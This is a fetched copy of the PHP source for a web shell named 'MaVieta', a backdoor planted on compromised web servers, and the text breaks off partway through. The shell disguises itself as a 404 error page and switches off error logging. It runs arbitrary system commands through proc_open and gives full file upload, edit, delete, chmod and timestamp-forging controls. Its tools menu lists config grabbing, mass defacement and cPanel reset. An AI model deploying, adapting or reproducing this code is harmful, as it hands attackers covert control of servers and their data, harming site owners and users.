Berhasil fetch. Konten:
<?php
?>
<!DOCTYPE html>
<html>
<head>
    <title>1#@!#!123s</title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="author" content="MaVieta">
    <meta name="viewport" content="PENTILKALERA" />
    <meta name="description" content="Error Page">
    <meta property="og:description" content="Error Page">
    <meta property="og:image" content="#">
    <meta name="robots" content="noindex">
    <meta name="googlebot" content="noindex">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">
    <link href="https://fonts.googleapis.com/css2?family=Carrois+Gothic&display=swap" rel="stylesheet">
    <link href="https://fonts.googleapis.com/css2?family=Bungee+Outline&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
</head>
<body>
    
<style>
    @import url("https://fonts.googleapis.com/css?family=Dosis");
    @import url("https://fonts.googleapis.com/css?family=Carrois+Gothic");
    @import url("https://fonts.googleapis.com/css?family=Bungee+Outline");
body {
    font-family: "Dosis", cursive;
    color: #fff;
    text-shadow:0px 0px 1px #757575;
    background-color: #212529;
    background-size: cover;
    background-attachment: fixed;
    background-repeat: no-repeat;
    background-size: 7%, 7%;
    background-position: right bottom, left bottom;
}

.directory-listing-table {
  margin: auto;
  background-color: #212529;
  padding: .7rem 1rem;
  max-width: 900px;
  width: 100%;
  box-shadow: 0 0 20px black;
  border: 1px solid #40BECC;
}
.header {
  margin: auto;
  background-color: #212529;
  padding: .7rem 1rem;
  max-width: 100%;
  width: 100%;
  box-shadow: 0 0 20px black;
  border-bottom: 1px solid #40BECC;
}
th {
    border-top: 1px solid #fff;
    border-bottom: 1px solid #fff;
}
tbody td {
  font-size: 13px;
  padding: 0.5rem;
  color: #fff;
  font-weight: 400;
  font-family: "Roboto", "Poppins", sans-serif;
}
tbody td a {
    text-decoration: none;
    color: #fff;
}
tbody td:not(:first-child) {
  text-align: center;
}

body::-webkit-scrollbar {
  width: 14px;
}

body::-webkit-scrollbar-track {
  background: #000;
}

body::-webkit-scrollbar-thumb {
  background-color: #212529;
  border: 3px solid #000;
}
input { 
    margin-bottom: 4px; 
    background: rgba(0,0,0,0.3);
    border: none;
    outline: none;
    padding: 5px;
    font-size: 15px;
    color: #fff;
    text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
    border: 1px solid rgba(0,0,0,0.3);
    border-radius: 14px;
    box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
    -webkit-transition: box-shadow .5s ease;
    -moz-transition: box-shadow .5s ease;
    -o-transition: box-shadow .5s ease;
    -ms-transition: box-shadow .5s ease;
    transition: box-shadow .5s ease;
}

textarea {
    max-width: 100%;
    max-height: 100%;
    padding-left: 2px;
    resize: none;
    overflow: auto;
    color: #fff;
    text-shadow: 1px 1px 1px rgba(0,0,0,0.3);
    border: 1px solid rgba(0,0,0,0.3);
    border-radius: 4px;
    box-shadow: inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);
    -webkit-transition: box-shadow .5s ease;
    -moz-transition: box-shadow .5s ease;
    -o-transition: box-shadow .5s ease;
    -ms-transition: box-shadow .5s ease;
    transition: box-shadow .5s ease;
    background: rgba(0,0,0,0.3);
}
.badge-action-edit:hover::after {
            content: "Edit"
 }
        .badge-action-rename:hover::after {
            content: "Rename"
        }
        .badge-action-chmod:hover::after {
            content: "Chmod"
        }

        .badge-action-delete:hover::after {
            content: "Delete"
        }

        .badge-action-download:hover::after {
            content: "Download"
        }
        .badge-action-unzip:hover::after {
            content: "UnZip"
        }
        .badge-action-tanggal:hover::after {
            content: "ChDate"
        }
        .badge-action-unzip:hover::after,
        .badge-action-download:hover::after,
        .badge-action-delete:hover::after,
        .badge-action-chmod:hover::after,
        .badge-action-rename:hover::after,
        .badge-action-tanggal:hover::after,
        .badge-action-edit:hover::after {
            padding: 5px;
            border-radius: 10px;
            margin-left: -40px;
            color: #40BECC;
            border: 2px solid #40BECC;
            background-color: #212529;
        }
        .badge-action-unzip:hover::after,
        .badge-action-download:hover::after,
        .badge-action-delete:hover::after,
        .badge-action-chmod:hover::after,
        .badge-action-rename:hover::after,
        .badge-action-tanggal:hover::after,
        .badge-action-edit:hover::after {
            width: 68px;
            text-align: center;
            margin-top: -53px;
            display: block;
            position: absolute;
            font-size: 14px;
        }

textarea::-webkit-scrollbar {
  width: 12px;
}

textarea::-webkit-scrollbar-track {
  background: #000000;
}

textarea::-webkit-scrollbar-thumb {
  background-color: #212529;
  border: 3px solid black;
}

a {
    color: #fff;
    text-decoration: none;
}

a:hover {
    color: #999797;
    text-shadow:0px 0px 2 0px #ED360E;
}

input,select,textarea {
    border: 1px #000000 solid;
    -moz-border-radius: 5px;
    -webkit-border-radius:5px;
    border-radius:5px;
}

select:after {
    cursor: pointer;
}
.pencet {
    background-color: rgb(0 0 0 / 57%);
    color: #fff;
    border-color: blanchedalmond;
}
.crot {
      border-radius: 50%;
      padding: 15px;
      width: 100px;
      height: 100px;
}
.MaVieta-text {
    font-size: 19pt;
    font-family: "Carrois Gothic", cursive;
    color: #fff;
    text-align: center;
    background: linear-gradient(200deg, #000000 25%, #ffffff 50%, #ffffff 75%, #ffffff 100%);
    background-size: 200% auto;
    -webkit-background-clip: text;
    -webkit-text-fill-color: transparent;
    animation: animate 1.2s linear infinite; 
    }
@keyframes animate{ to { background-position: 200% center;
      }
    }
body, a, button:link{cursor:url(http://4.bp.blogspot.com/-hAF7tPUnmEE/TwGR3lRH0EI/AAAAAAAAAs8/6pki22hc3NE/s1600/ass.png), 
    default;
} 
    button:hover {
    cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),
    wait;
}
    a:hover {
    cursor:url(http://3.bp.blogspot.com/-bRikgqeZx0Q/TwGR4MUEC7I/AAAAAAAAAtA/isJmS0r35Qw/s1600/pointer.png),
    wait;
}
</style>
</td>
<script>
function myFunction() {
  var copyText = document.getElementById("myInput");
  copyText.select();
  copyText.setSelectionRange(0, 99999); // For mobile devices
  navigator.clipboard.writeText(copyText.value);
  alert("Copied Successfully!!");
}
</script>
<?php
error_reporting(0);
set_time_limit(0);
@clearstatcache();
@ini_set('error_log', null);
@http_response_code(404);
$web = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://".$_SERVER['HTTP_HOST'];
$disfunc = @ini_get("disable_functions");
if (empty($disfunc)) {
    $disf = "<font color='lime'>AMAN</font>";
} else {
    $disf = "<font color='red'>".$disfunc."</font>";
}
function author() {
    echo "</div><table class='directory-listing-table'><td><center><font face='Carrois Gothic' size='3px'>2017 © MaVieta | D704T team</center></td></table><br>";
    exit();
}

function cekdir() {
    if (isset($_GET['path'])) {
        $serlok = $_GET['path'];
    } else {
        $serlok = getcwd();
    }
    if (is_writable($serlok)) {
        return "<font color='lime'>Aman Coy</font>";
    } else {
        return "<font color='red'>PENTILKALERA!</font>";
    }
}

function cekroot() {
    if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
        return "<font color='lime'>Aman Coy</font>";
    } else {
        return "<font color='red'>PENTILKALERA!</font>";
    }
}
function MaVieta_ex($file) {
    $pile = $file;
    $pch = pathinfo($pile, PATHINFO_FILENAME);
    return $pch;
}

function xrmdir($dir) {
    $items = scandir($dir);
    foreach ($items as $item) {
        if ($item === '.' || $item === '..') {
            continue;
        }
        $path = $dir.'/'.$item;
        if (is_dir($path)) {
            xrmdir($path);
        } else {
            unlink($path);
        }
    }
    rmdir($dir);
}
function net($hexnet) {
            for ($i = 0; $i < strlen($hexnet); $i++) {
                $MaVieta .= dechex(ord($hexnet[$i]));
            }
            return $MaVieta;
        }
function owner($file) {
    if (function_exists("posix_getpwuid")) {
        $tod = @posix_getpwuid(fileowner($file));
        return "<center>".$tod['name']."</center>";
    } else {
        return "<center>".fileowner($file)."</center>";
    }
}

function cekwrite($serlok) {
    $izin = substr(sprintf('%o', fileperms($serlok)), -4);
    if (is_writable($serlok)) {
        return "<font color=lime>".$izin."</font>";
    } else {
        return "<font color=red>".$izin."</font>";
    }
}
function cmd($gas, $serlok) {
    $crot = $gas;
    $pr = "proc_open";
    if (function_exists($pr)) {
    $tod = @proc_open($crot, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
    echo "".stream_get_contents($crottz[1])."</textarea></center><br>";
    } else {
        echo "<font color='orange'></font>";
    }
}
function ekse($coman, $serlok) {
    $ler = "2>&1";
    if (!preg_match("/".$ler."/i", $coman)) {
        $coman = $coman." ".$ler;
    }
    $komen = $coman;
    $pr = "proc_open";
    if (function_exists($pr)) {
    $tod = @$pr($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $crottz, $serlok);
    echo "<pre><textarea rows='25' style='color:lime;' readonly='' cols='120px'>
    ".htmlspecialchars(stream_get_contents($crottz[1]))."</textarea></pre><br>";
    } else {
        echo "<font color='orange'>proc_open function is disabled!!</font>";
    }
}
function ipserv() {
    if (empty($_SERVER['SERVER_ADDR'])) {
        return gethostbyname($_SERVER['SERVER_NAME']);
        if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
            return $_SERVER['SERVER_NAME'];
        }
    } else {
        return $_SERVER['SERVER_ADDR'];
    }
}

function cekfile($file) {
     return '<i class="fa fa-file-code-o" style="font-size:17px;color:#456DEB;"></i>';
}
function filedate($file) {
    return date("F d Y g:i:s", filemtime($file));
}
function fext($file) {
    $sub = "\163\x75" . "\142\x73" . "\x74\x72";
    return $sub(strrchr($file,'.'),1);
} function gazz($file) {
    $fbiasa = array("php","phtml","shtml","phar","php7","html","htm","inc","phps","txt","js","css","htaccess","bin","pl","py","sh","php58","PhP7","aspx","dll","ini");
    $notf = array("jpeg","jpg","png","gif","ico","webp","mp3","m4A","flac","wav","wma","3gp","ogg","webm","mp4","exe");
    $stl = "\x73\x74" . "\162\164" . "\157\154\x6f" . "\167\x65\162";
    $ext=$stl(fext($file));
    if ($file == 'error_log') {
        return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color: #36F239'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil' style='color: #fff'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear' style='color: #06D2D5'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar' style='color: #4542F9'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash' style='color: #E53A3A'></i></button>
<button type='submit' class='btn btn-outline-secondary badge-action-unzip' name='pilih' value='unzip'>
<i class='fa fa-file-archive-o' style='color: #F1BE0F'></i></button>";
    } elseif(in_array($ext,$fbiasa)) {
        return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color:#7AFF41'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
    } elseif(in_array($ext,$notf)) {
        return "
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
    }  elseif($ext == 'zip') {
        return "
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>
<button type='submit' class='btn btn-outline-warning badge-action-unzip' name='pilih' value='unzip'>
<i class='fa fa-file-archive-o'></i></button>";
    } else {
        return "
<button type='submit' class='btn btn-outline-secondary badge-action-edit' name='pilih' value='edit'>
<i class='fa fa-edit' style='color:#7AFF41'></i></button>
<button type='submit' class='btn btn-outline-light badge-action-rename' name='pilih' value='gantinama'>
<i class='fa fa-pencil'></i></button>
<button type='submit' class='btn btn-outline-info badge-action-chmod' name='pilih' value='chmod'>
<i class='fa fa-gear'></i></button>
<button type='submit' class='btn btn-outline-primary badge-action-tanggal' name='pilih' value='chdate'>
<i class='fa fa-calendar'></i></button>
<button type='submit' class='btn btn-outline-danger badge-action-delete' name='pilih' value='hapus'>
<i class='fa fa-trash'></i></button>";
    }
}

function unzip($file, $serlok) {
    if (!is_readable($file)) {
        red("<table class='directory-listing-table' style='color:orange;'><thead><td><font color='orange'>Cannot Unzip File / Unreadable File !</font></td></thead></table>");
        die();
    } elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> This isn't Zip File</center></font></td></table>";
        die();
    }
    $zip = new ZipArchive;
    $res = $zip -> open($file);
    if ($res == true) {
        $zip -> extractTo($serlok);
        $zip -> close();
        echo "<table class='directory-listing-table' style='border-color:lime;'> <td>Unzip File Successfully => <font color='lime'>".basename($_POST['path'])."</font><br>
        Extract to : <font color='aqua'>".$file."</font></td></thead</table>";
    } else {
        echo "<table class='directory-listing-table' style='border-color:red;'><td><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Unzip File!!</font></td></table>";
    }
    exit();
}
foreach($_POST as $key => $value){
    $_POST[$key] = stripslashes($value);
}

if(isset($_GET['path'])){
    $serlok = $_GET['path'];
    $serlok2 = $_GET['path'];
} else {
    $serlok = getcwd();
    $serlok2 = getcwd();
}

$serlok = str_replace('\\','/',$serlok);
$serloks = explode('/',$serlok);
$serlokbos = @scandir($serlok);


echo '<table class="header"><td><center>
    <div style="font-family:Bungee Outline;font-size:24px;"><a href="'.$_SERVER['SCRIPT_NAME'].'"><i class="fa-brands fa-napster"></i> MaVieta</a></center></div></td><td>';
echo '<table align="center"><td>
<div class="btn-group me-2" role="group" aria-label="First group">
<button type="button" onclick=location.href="'.$_SERVER['SCRIPT_NAME'].'" class="btn btn-outline-light"><font color="aqua"><i class="fa fa-home"></i> Home</font></button>
<div class="btn-group me-2" role="group" aria-label="First group">
<button type="button" onclick=location.href="?path='.$serlok.'&'.net("cmd").'=opet" class="btn btn-outline-light"><i class="fa fa-terminal"></i> Console</button>';

echo '<button type="button" onclick=location.href="?path='.$serlok.'&'.net("upload").'=opet" class="btn btn-outline-light"><i class="fa fa-upload"></i> Upload</button>

<button type="button" class="btn btn-outline-light"onclick=location.href="?path='.$serlok.'&'.net("info").'=opet"><i class="fa fa-info-circle"></i> information</button>

<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfile").'=opet"><i class="fa-solid fa-file-circle-plus" style="color:#1F5ACF;"></i> Create File</button>

<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("buatfolder").'=opet" style="float: right;"><i class="fa-solid fa-folder-plus" style="color:#FAA625;"></i> Create Folder</button>

<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("about").'=opet" style="float: right;"><i class="fa fa-info"></i> About</button>

<button type="button" class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("tool").'=opet"><i class="fa fa-wrench" style="color:#A7DBDF;"></i> Tools</button>
</td></tr></div>
</div></div></td></table></table><br>';
echo '<table class="directory-listing-table"><td><i class="fa fa-folder" style="color:#F19013;"></i> <b>:</b> ';
foreach($serloks as $id => $lok){
    if($lok == '' && $id == 0){
        echo '<a href="?path=/">/ </a></center>';
        continue;
    }
    if($lok == '') continue;
    echo '<a href="?path=';
    for($i=0; $i<=$id; $i++){
    echo $serloks[$i];
    if($i != $id) echo "/";
} 
echo '">'.$lok.'</a> / ';
}
echo '</td></thead></table><br>';
    if (isset($_REQUEST['logout'])) {
        session_start();
        session_destroy();
        echo '<script>window.location="'.$_SERVER['SCRIPT_NAME'].'";</script>';
    }

if (isset($_GET['viewfile'])) {
    $files = basename($_GET['viewfile']);
    echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>$files</font>";
    echo '<form method="POST" action="?pilihan&path='.$serlok.'">';
    echo "<table width='20%' border='0' cellpadding='0' cellspacing='0' align='center'><td>
    <a href='?path=$serlok' class='btn btn-outline-light'><i class='fa fa-arrow-left'></i> back</a>";
    echo gazz($file);
    echo "<button type='button' style='float:right;' class='btn btn-outline-light' onclick='myFunction()'><i class='fa fa-copy'></i> Copy</button></div><br><br>";
    echo "<input type='hidden' name='type' value='file'>
    <input type='hidden' name='name' value='$files'>
    <input type='hidden' name='path' value='$serlok/$files'>";
    echo "<textarea readonly='' cols=120 rows=30 id='myInput'>".htmlspecialchars(file_get_contents($_GET['viewfile']))."</textarea></td></table></table><br>";
    exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
    if (is_dir($_POST['path'])) {
        xrmdir($_POST['path']);
        if (file_exists($_POST['path'])) {
            echo '<table class="directory-listing-table" style="border-color:red;"><td><center><font color="red"><i class="fa fa-exclamation-triangle" aria-hidden="true"></i> Failed to delete Directory</font></center></td></table>';
        } else {
            echo '<table class="directory-listing-table" style="border-color:lime;"><td><center><font color="lime"><i class="fa fa-trash"></i> Folder removed</font></center></td></table>';
        }
    } elseif (is_file($_POST['path'])) {
        @unlink($_POST['path']);
        if (file_exists($_POST['path'])) {
            echo "<table class='directory-listing-table' style='border-color:red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to Delete File</font></center></td></table>";
        } else {
            echo "<table class='directory-listing-table' style='border-color:lime;'><td><center><i class='fa fa-trash'></i> File removed <font color='lime'>".basename($_POST['path'])."</font></center></td></table>";
        }
    }
    exit();    
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
    if (isset($_POST['gantin'])) {
        $namabaru = $_GET['path']."/".$_POST['newname'];
        if (@rename($_POST['path'], $namabaru) === true) {
            echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Change Name Success<center></td></table><br>";
            if ($_POST['type'] == "file") {
                echo "<table class='directory-listing-table'><td><center>Filename : <font color='orange'>".basename($_POST['newname'])."</font><br><br>";
            } else {
                echo "<table class='directory-listing-table'><td><center><center>Folder : <font color='orange'>".basename($_POST['newname'])."</font><br>";
            }
            echo '<form method="post">
            <div class="input-group mb-1" style="width:300px;">
            <input name="newname" type="text" class="form-control" size="20" placeholder="New name" />
            <input type="hidden" name="path" value="'.$_POST['newname'].'">
            <input type="hidden" name="pilih" value="gantinama">';
            if ($_POST['type'] == "file") {
                echo '<input type="hidden" name="type" value="file">';
            } else {
                echo '<input type="hidden" name="type" value="dir">';
            }
            echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1">
            </div></form></td></table>';
        } else {
            echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> FAILED TO CHANGE NAME</font></center></td></table>";
        }
    } else {
        if ($_POST['type'] == "file") {
            echo "<table class='directory-listing-table'><td><center>Filename <font color='orange'>: ".basename($_POST['path'], $_GET['file'])."</font><br><br>";
        } else {
            echo "<table class='directory-listing-table'><td><center>Folder <font color='orange'>: ".basename($_POST['path'])."</font><br><br>";
        }
        echo '
        <form method="post">
        <div class="input-group mb-1" style="width:300px;">
        <input name="newname" type="text" class="form-control" size="20" placeholder="New name" />
        <input type="hidden" name="path" value="'.$_POST['path'].'">
        <input type="hidden" name="pilih" value="gantinama">';
        if ($_POST['type'] == "file") {
            echo '<input type="hidden" name="type" value="file">';
        } else {
            echo '<input type="hidden" name="type" value="dir">';
        }
        echo '<input type="submit" value="Change" name="gantin" class="btn btn-outline-light mb-1"/>
        </div></form></td></table><br>';
    } exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
    if (isset($_POST['gasedit'])) {
        $edit = file_put_contents($_POST['path'], $_POST['src']);
        if ($edit == true) {
            echo "<table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>File saved Successfully</font></center></td></table><br>";
        } else {
            echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Can't save file/Permission Denied</font></center></td></table><br>";
        }
    }
    echo "<center><table class='directory-listing-table'><td><center> Filename : <font color='orange'>".basename($_POST['path'])."</font><br><br>";
    echo '<form method="post">
    <div class="btn-group me-2" role="group" aria-label="First group">
    <a href="?path='.$serlok.'" class="btn btn-outline-light"><i class="fa fa-arrow-left"></i> back</a>
    <button type="submit" name="gasedit" class="btn btn-outline-light"style="width:250px;">
    <i class="fa fa-save"></i> Save</button>
    <button type="button" class="btn btn-outline-light" onclick="myFunction()"><i class="fa fa-copy"></i> Copy</button></div><br><br>
    <textarea type="text" cols=120 id="myInput" rows=30 name="src">'.htmlspecialchars(@file_get_contents($_POST['path'])).'</textarea><br>
    <input type="hidden" name="path" value="'.$_POST['path'].'">
    <input type="hidden" name="pilih" value="edit">
    </form><br></td></thead></table><br>'; exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdatef") {
    $filedate = basename($_POST['path']);
      $tgl = date("F d Y g:i:s", filemtime($_POST['path']));
          echo "<table class='directory-listing-table'><td>
          <form method='post'><center>
          <font color='#fff'>Ubah Tanggal<br>Folder :</font> <font color='orange'>$filedate</font> 
          <br>$tgl<br><br><div class='input-group mb-3' style='width:280px;'>         
          <input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/>
          <input type='hidden' name='path' value='".$_POST['path']."'>
          <input type='hidden' name='pilih' value='chdatef'>
          <button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button></div></form></center></td></table>";
          if (isset($_POST['change'])) {
        $tanggal = strtotime($_POST['tanggal']);
        if (@touch($_POST['path'], $tanggal) == true) {
          echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>";
        } else {
          echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>";
        }
      }exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chdate") {
    $filedate = basename($_POST['path']);
      $tgl = date("F d Y g:i:s", filemtime($_POST['path']));
          echo "<table class='directory-listing-table'><td>
          <form method='post'><center><font color='#fff'>Ubah Tanggal<br>File :</font> <font color='orange'>$filedate <br></font>$tgl
          <br><br><div class='input-group mb-3' style='width:300px;'>
          <input name='tanggal' type='text' class='form-control' value='".$_POST['tanggal']."' placeholder='$tgl'/>
          <input type='hidden' name='path' value='".$_POST['path']."'>
          <input type='hidden' name='pilih' value='chdate'>
          <button type='submit' class='btn btn-outline-light mb-1' name='change' value='change'>Change</button>
          </div></form></center></td></table>";
          if (isset($_POST['change'])) {
        $tanggal = strtotime($_POST['tanggal']);
        if (@touch($_POST['path'], $tanggal) == true) {
          echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'><center>Changed Successfully!!</font></center></td></table>";
        } else {
          echo "<br><table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change date!!</td></table>";
        }
      }exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmodf") {
    $files = basename($_POST['path']);
    $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms';
      echo "<table class='directory-listing-table'><td>
      <br><center> <font color='#fff'>Folder : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br>
      <form method='post'>
      <div class='input-group mb-3' style='width:230px;'>
    <input type='text' name='mod1' maxlength='4' class='form-control' height='10' value='".$_POST['mod1']."' placeholder='0755' required/> 
    <input type='hidden' name='path' value='".$_POST['path']."'>
    <input type='hidden' name='pilih' value='chmodf'>
    <button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button>
    </div></form></td></table>";
    if (isset($_POST['ganti'])) {
      $opet = @chmod($_POST['path'], octdec($_POST['mod1']));
    if ($opet == true) {
        echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>";
        } else {
            echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>";
        }
      }exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "chmod") {
    $files = basename($_POST['path']);
    $sbr = 'substr'; $spr = 'sprintf'; $flperm = 'fileperms';
      echo "<table class='directory-listing-table'><td>
      <center><font color='#fff'>Filename : <font color='orange'>$files</font> (".$sbr($spr('%o',$flperm($_POST['path'])), -4).")<br><br>
      <form method='post'>
      <div class='input-group mb-3' style='width:230px;'>
    <input type='text' name='mod1' class='form-control' maxlength='4' height='10' value='".$_POST['mod1']."' placeholder='0644' required/> 
    <input type='hidden' name='path' value='".$_POST['path']."'>
    <input type='hidden' name='pilih' value='chmod'>
    <br><br><button type='submit' class='btn btn-outline-light mb-1' name='ganti' value='ganti'>Change</button></div>
    </form></td></table>";
    if (isset($_POST['ganti'])) {
      $opet = @chmod($_POST['path'], octdec($_POST['mod1']));
    if ($opet == true) {
        echo "<br><table class='directory-listing-table' style='border: 1px solid lime;'><td><center><font color='lime'>Changed Successfully!!</font></center></td></table>";
        } else {
            echo "<table class='directory-listing-table' style='border: 1px solid red;'><td><center><font color='red'><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> Failed to change!!</font></center></td></table>";
        }
      }exit();
} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
    unzip($_POST['path'], $serlok);

} elseif ($_REQUEST[net('upload')] == "opet") {
    echo "<table class='directory-listing-table'><td><center>
    <form method='POST' enctype='multipart/form-data' id='upload'><h5><i class='fa fa-upload'></i> UPLOAD FILES<h5>
    <div class='input-group' style='width:360px;'>
    <input type='file' name='MaVietafile' id='MaVieta' style='background-color: grey;' class='form-control' name='uplod'>
    <input type='submit' class='btn btn-outline-light' for='inputGroupFile02' name='uplod' value='Upload'></div>
              </form></center></td></table>";
     if (isset($_POST['uplod'])) {
        if ($_POST['dirnya'] == "2") {
            $serlok = $_SERVER['DOCUMENT_ROOT'];
        }
        if (empty($_FILES['MaVietafile']['name'])) {
            echo "<br><table class='directory-listing-table' style='border-color:orange;'><td><font color='orange'><center><i class='fa fa-exclamation-triangle' aria-hidden='true'></i> File not selected</center></font>";
        } else {
            $data = @file_put_contents($serlok."/".$_FILES['MaVietafile']['name'], @file_get_contents($_FILES['MaVietafile']['tmp_name']));
                if (file_exists($serlok."/".$_FILES['MaVietafile']['name'])) {
                    $fl = $serlok."/".$_FILES['MaVietafile']['name'];
                    echo "<br><table class='directory-listing-table' style='border-color:lime;'><td>
                    Uploaded => <font color='lime'><i>".$_FILES['MaVietafile']['name']."</i></font><br>";
                    if (strpos($serlok, $_SERVER['DOCUMENT_ROOT']) !== false) {
                        $lwb = str_replace($_SERVER['DOCUMENT_ROOT'], $web."/", $fl);
                        echo "Link : <a href='".$lwb."' target='_blank'><font color='lime'>Click here</font></a></td></table><br>";
                    }
                    echo "<br>";
                } else {
                    echo "<br><table class='directory-listing-table' style='border-color:red;'><td><font color='red'><center>There was an error uploading your file.</font></td></table>";
            }
        }
    }exit(); 

 } elseif ($_GET[net('tool')] == "opet") {
echo '<table class="directory-listing-table"><thead><td><center><font color=orange>Select Tools</font><hr>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("grab_config").'=opet">Grab Config</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("hashiden").'=opet">Hash Identifier</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("ner").'=opet">Adminer</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("massdef").'=opet">Mass Deface</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("scanshell").'=opet">Shell Finder</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("lokfile").'=opet">Lock File</button>
<button class="btn btn-outline-light" onclick=location.href="?path='.$serlok.'&'.net("resetcp").'=opet">Reset Cpanel</button><hr> ';
        exit();
} elseif ($_GET[net('cmd')] == "opet") {
